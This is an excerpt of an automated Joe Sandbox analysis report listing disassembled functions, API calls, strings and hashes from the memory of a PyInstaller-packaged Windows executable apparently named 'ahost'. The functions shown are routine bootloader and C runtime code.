Instruction Fuzzy Hash: 50F03A04E09A0E44FF647F616C412B992B04F94BB8FC802309E3E852EAEE2CA44482F0

Non-executed Functions

Function 00007FF7F91E8BD0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257synchronizationwindowregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F91E9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7F91E45E4,00000000,00007FF7F91E1985), ref: 00007FF7F91E9439

SetConsoleCtrlHandler.KERNEL32(?,?,FFFFFFFF,00007FF7F91E3F7F), ref: 00007FF7F91E8C2B
GetStartupInfoW.KERNEL32(?,FFFFFFFF,00007FF7F91E3F7F), ref: 00007FF7F91E8C46

Part of subcall function 00007FF7F91FA4EC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F91FA500

Part of subcall function 00007FF7F91F878C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F91F87F3

GetCommandLineW.KERNEL32(?,FFFFFFFF,00007FF7F91E3F7F), ref: 00007FF7F91E8CD6
CreateProcessW.KERNEL32 ref: 00007FF7F91E8D0E
GetLastError.KERNEL32(?,FFFFFFFF,00007FF7F91E3F7F), ref: 00007FF7F91E8D18

Part of subcall function 00007FF7F91E2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7F91E3706,?,00007FF7F91E3804), ref: 00007FF7F91E2C9E
Part of subcall function 00007FF7F91E2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7F91E3706,?,00007FF7F91E3804), ref: 00007FF7F91E2D63
Part of subcall function 00007FF7F91E2C50: MessageBoxW.USER32 ref: 00007FF7F91E2D99

RegisterClassW.USER32 ref: 00007FF7F91E8D70
GetLastError.KERNEL32(?,FFFFFFFF,00007FF7F91E3F7F), ref: 00007FF7F91E8D7B
CreateWindowExW.USER32 ref: 00007FF7F91E8DC5
GetLastError.KERNEL32(?,FFFFFFFF,00007FF7F91E3F7F), ref: 00007FF7F91E8DD7
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF7F91E3F7F), ref: 00007FF7F91E8DF2
GetLastError.KERNEL32(?,FFFFFFFF,00007FF7F91E3F7F), ref: 00007FF7F91E8E05
PeekMessageW.USER32 ref: 00007FF7F91E8E29
TranslateMessage.USER32 ref: 00007FF7F91E8E37
DispatchMessageW.USER32(?,FFFFFFFF,00007FF7F91E3F7F), ref: 00007FF7F91E8E41
PeekMessageW.USER32 ref: 00007FF7F91E8E5C
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF7F91E3F7F), ref: 00007FF7F91E8E6E
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF7F91E3F7F), ref: 00007FF7F91E8E89
TerminateProcess.KERNEL32(?,FFFFFFFF,00007FF7F91E3F7F), ref: 00007FF7F91E8E9F
GetLastError.KERNEL32(?,FFFFFFFF,00007FF7F91E3F7F), ref: 00007FF7F91E8EA9
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF7F91E3F7F), ref: 00007FF7F91E8EB7
DestroyWindow.USER32(?,FFFFFFFF,00007FF7F91E3F7F), ref: 00007FF7F91E8FF4
GetExitCodeProcess.KERNEL32 ref: 00007FF7F91E9009
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF7F91E3F7F), ref: 00007FF7F91E9012
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF7F91E3F7F), ref: 00007FF7F91E901F

Strings

PyInstaller Onefile Hidden Window, xrefs: 00007FF7F91E8D85
Failed to create child process!, xrefs: 00007FF7F91E8D20
PyInstallerOnefileHiddenWindow, xrefs: 00007FF7F91E8D44
CreateProcessW, xrefs: 00007FF7F91E8D27

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
API String ID: 3832162212-3165540532
Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
Instruction ID: 7bda02531730b8b89590b024f1c7978ae2ea06bbc3aa9d10b1d93ce67a436a7b
Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
Instruction Fuzzy Hash: D6D15331E08A4686FB60AF34EC542ADB774FB84B58F900235DA6E536E8DF3CE5458790

Function 00007FF7F91E83B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00007FF7F91E8B09,00007FF7F91E3FA5), ref: 00007FF7F91E841B
RemoveDirectoryW.KERNEL32(?,00007FF7F91E8B09,00007FF7F91E3FA5), ref: 00007FF7F91E849E
DeleteFileW.KERNEL32(?,00007FF7F91E8B09,00007FF7F91E3FA5), ref: 00007FF7F91E84BD
FindNextFileW.KERNEL32(?,00007FF7F91E8B09,00007FF7F91E3FA5), ref: 00007FF7F91E84CB
FindClose.KERNEL32(?,00007FF7F91E8B09,00007FF7F91E3FA5), ref: 00007FF7F91E84DC
RemoveDirectoryW.KERNEL32(?,00007FF7F91E8B09,00007FF7F91E3FA5), ref: 00007FF7F91E84E5

Strings

%s\*, xrefs: 00007FF7F91E83E2

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
String ID: %s\*
API String ID: 1057558799-766152087
Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
Instruction ID: fdff8ec491896a23328cbf41d2d808ff7423be29052fd79de16381446acd9fcc
Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
Instruction Fuzzy Hash: 47412F21E0C54286EF75BF14BC446B9A3B0FB94754FC00671D56E826DCDF2CE54587A1

Function 00007FF7F91ED19C Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF7F91ED1B8
RtlCaptureContext.KERNEL32 ref: 00007FF7F91ED1E5
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7F91ED1FF
RtlVirtualUnwind.KERNEL32 ref: 00007FF7F91ED240
IsDebuggerPresent.KERNEL32 ref: 00007FF7F91ED294
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7F91ED2B1
UnhandledExceptionFilter.KERNEL32 ref: 00007FF7F91ED2BC

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
Instruction ID: 18a1dde9d9c542ff972fd2a0f1a51436f90a237a079196a8dc08a7e2c64853f6
Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
Instruction Fuzzy Hash: 30312176A08B858AEB60AF60EC403EE7374FB84744F844439DA5E47BA8DF38D548C760

Function 00007FF7F9205C70 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF7F9205CB5

Part of subcall function 00007FF7F9205608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F920561C

Part of subcall function 00007FF7F91FA9B8: HeapFree.KERNEL32(?,?,?,00007FF7F9202D92,?,?,?,00007FF7F9202DCF,?,?,00000000,00007FF7F9203295,?,?,?,00007FF7F92031C7), ref: 00007FF7F91FA9CE
Part of subcall function 00007FF7F91FA9B8: GetLastError.KERNEL32(?,?,?,00007FF7F9202D92,?,?,?,00007FF7F9202DCF,?,?,00000000,00007FF7F9203295,?,?,?,00007FF7F92031C7), ref: 00007FF7F91FA9D8

Part of subcall function 00007FF7F91FA970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7F91FA94F,?,?,?,?,?,00007FF7F91FA83A), ref: 00007FF7F91FA979
Part of subcall function 00007FF7F91FA970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7F91FA94F,?,?,?,?,?,00007FF7F91FA83A), ref: 00007FF7F91FA99E

_get_daylight.LIBCMT ref: 00007FF7F9205CA4

Part of subcall function 00007FF7F9205668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F920567C

_get_daylight.LIBCMT ref: 00007FF7F9205F1A
_get_daylight.LIBCMT ref: 00007FF7F9205F2B
_get_daylight.LIBCMT ref: 00007FF7F9205F3C
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7F920617C), ref: 00007FF7F9205F63

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID:
API String ID: 4070488512-0
Opcode ID: 0c9ae4c43809035ead388df1149d8e15e4647e923e6de7bb59d770bfc2eeda5e
Instruction ID: 710ed636d11e49654cdae276d78bd6cf1d969b7de673a3ac37cbff5431a5bc76
Opcode Fuzzy Hash: 0c9ae4c43809035ead388df1149d8e15e4647e923e6de7bb59d770bfc2eeda5e
Instruction Fuzzy Hash: 8ED19122E0824246F7A4BF229C815B9A771FF44794FC48136DA6D876EDEF3DE44187A0

Function 00007FF7F91FA684 Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF7F91FA6FD
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7F91FA715
RtlVirtualUnwind.KERNEL32 ref: 00007FF7F91FA750
IsDebuggerPresent.KERNEL32 ref: 00007FF7F91FA789
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7F91FA793
UnhandledExceptionFilter.KERNEL32 ref: 00007FF7F91FA79E

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
Instruction ID: 3572768d45e12153d67653adfa5f92bef6f25672701e186a93ff6b9ec44830e8
Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
Instruction Fuzzy Hash: 92315636A14B8186EB60DF25EC406AEB3B4FB84754F940135DB6D43BA8EF3CD1458750

Function 00007FF7F91E81C0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F91E9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7F91E45E4,00000000,00007FF7F91E1985), ref: 00007FF7F91E9439

ExpandEnvironmentStringsW.KERNEL32(?,00007FF7F91E88A7,?,?,00000000,00007FF7F91E3CBB), ref: 00007FF7F91E821C

Part of subcall function 00007FF7F91E2810: MessageBoxW.USER32 ref: 00007FF7F91E28EA

Strings

CreateDirectory, xrefs: 00007FF7F91E836C
LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!, xrefs: 00007FF7F91E828D
\, xrefs: 00007FF7F91E8251
%.*s, xrefs: 00007FF7F91E82FC
LOADER: failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF7F91E81F3
LOADER: failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF7F91E82C9
LOADER: failed to create runtime-tmpdir path %ls!, xrefs: 00007FF7F91E8363
LOADER: failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF7F91E8230

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
API String ID: 1662231829-930877121
Opcode ID: 6e1db7188d29f55993033d39f9d092d149d7f4b46b4bc38197dd47a6e93f4cef
Instruction ID: 998338be0356ef53edad8c5234d32c8da0b73fda9f7c5dc7afbe5a0bed39e020
Opcode Fuzzy Hash: 6e1db7188d29f55993033d39f9d092d149d7f4b46b4bc38197dd47a6e93f4cef
Instruction Fuzzy Hash: 0C517511E2964342FB55BF25FC516BAE2B1AF94780FC44431D62E826EDEE2CF40583E1

Function 00007FF7F91E2180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF7F91E21AB
SelectObject.GDI32 ref: 00007FF7F91E21F2
DrawTextW.USER32 ref: 00007FF7F91E2215
SelectObject.GDI32 ref: 00007FF7F91E222B
ReleaseDC.USER32 ref: 00007FF7F91E223B
MoveWindow.USER32 ref: 00007FF7F91E228B
MoveWindow.USER32 ref: 00007FF7F91E22CB
MoveWindow.USER32 ref: 00007FF7F91E231E
MoveWindow.USER32 ref: 00007FF7F91E2366

Strings

P%, xrefs: 00007FF7F91E21FF

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction ID: c36f94774f6ab4f024c77e6b184c67509492e4bd331c5dfa153205433277ec1a
Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction Fuzzy Hash: 6251C6266047A186DB34AF26A8181BEB7B1FB98B61F404135EBDF83694DF3CD145D720

Function 00007FF7F91F6300 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F91F6343
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F91F6730
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F91F69CC

Strings

p, xrefs: 00007FF7F91F646D
p, xrefs: 00007FF7F91F63F5
f, xrefs: 00007FF7F91F6465
:, xrefs: 00007FF7F91F64FC
-, xrefs: 00007FF7F91F63D9

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction ID: 3f16a011aafa4bf8f99b7e5f5abe6c6527e1760d4a1e3a758ce7a3956ad42edd
Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction Fuzzy Hash: F8128362E0814F86FB247E14B954279F6B9FB50798FC84135D7B9466CCEB3CE5408BA0

Function 00007FF7F91EEA78 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF7F91EEAD5

Part of subcall function 00007FF7F91EFA2C: __GetUnwindTryBlock.LIBCMT ref: 00007FF7F91EFA6F
Part of subcall function 00007FF7F91EFA2C: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF7F91EFA94

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF7F91EEBAD
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF7F91EEDFB
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7F91EEF08

Strings

csm, xrefs: 00007FF7F91EEB56
csm, xrefs: 00007FF7F91EEBD0
csm, xrefs: 00007FF7F91EEAEF

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
Instruction ID: 5bb8beb5652ff88e3a8c2e704395b0bc10e311342c33df1e193f6f55d6a44f28
Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
Instruction Fuzzy Hash: B8D16C22E0864187EB21BF65A8403AEA7B0FB45788F940135EE5D57BD9DF78F090C792

Function 00007FF7F91E2C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7F91E3706,?,00007FF7F91E3804), ref: 00007FF7F91E2C9E
FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7F91E3706,?,00007FF7F91E3804), ref: 00007FF7F91E2D63
MessageBoxW.USER32 ref: 00007FF7F91E2D99

Strings

Error, xrefs: 00007FF7F91E2D8C
<FormatMessageW failed.>, xrefs: 00007FF7F91E2D70
%ls: , xrefs: 00007FF7F91E2D22
[PYI-%d:ERROR] , xrefs: 00007FF7F91E2CA6

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: Message$CurrentFormatProcess
String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
API String ID: 3940978338-251083826
Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
Instruction ID: 968e6561d5ca9252b9187ce52e3381e71b3dcd33bc4c7334633531accefcc7f5
Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
Instruction Fuzzy Hash: 1831B722B0864142FB20BF15BC146AAA6A5BF88798F800135EF5E937ADDE3CE546C350

Function 00007FF7F91E2A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF7F91E351A,?,00000000,00007FF7F91E3F23), ref: 00007FF7F91E2AA0

Strings

[PYI-%d:%s] , xrefs: 00007FF7F91E2AA8
Warning, xrefs: 00007FF7F91E2B1E
WARNING, xrefs: 00007FF7F91E2AAF
0, xrefs: 00007FF7F91E2B16
Warning [ANSI Fallback], xrefs: 00007FF7F91E2B0F

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: CurrentProcess
String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-2900015858
Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
Instruction ID: 1a99fab6e1f5fd11ff65ec8fe9c775221bb2b1cc97259773eb1a6d0d69708f47
Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
Instruction Fuzzy Hash: 5A217132A1878182E760EF51BC817EAA3A4BB88784F800135FE9D9369DDF3CE5458690

Function 00007FF7F91FB1C0 Relevance: 10.6, APIs: 7, Instructions: 62COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7F91FB1CF
FlsGetValue.KERNEL32 ref: 00007FF7F91FB1E4
FlsSetValue.KERNEL32 ref: 00007FF7F91FB205
FlsSetValue.KERNEL32 ref: 00007FF7F91FB232
FlsSetValue.KERNEL32 ref: 00007FF7F91FB243
FlsSetValue.KERNEL32 ref: 00007FF7F91FB254
SetLastError.KERNEL32 ref: 00007FF7F91FB26F

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 7a7efe5704aebd884d83a549bac9021180a30b6e3a5084d39c82c78793c2ea5e
Instruction ID: 05fed30dbe833381ccbe02d857a0200d849fcf7b0633491a18c86575560cce8f
Opcode Fuzzy Hash: 7a7efe5704aebd884d83a549bac9021180a30b6e3a5084d39c82c78793c2ea5e
Instruction Fuzzy Hash: 67214A20E4D20A81FB697B617E5517DD1625F447A8F844734EA3E46ADEFE2CB44183A0

Function 00007FF7F91FB338 Relevance: 9.1, APIs: 6, Instructions: 57COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF7F91F4F81,?,?,?,?,00007FF7F91FA4FA,?,?,?,?,00007FF7F91F71FF), ref: 00007FF7F91FB347
FlsSetValue.KERNEL32(?,?,?,00007FF7F91F4F81,?,?,?,?,00007FF7F91FA4FA,?,?,?,?,00007FF7F91F71FF), ref: 00007FF7F91FB37D
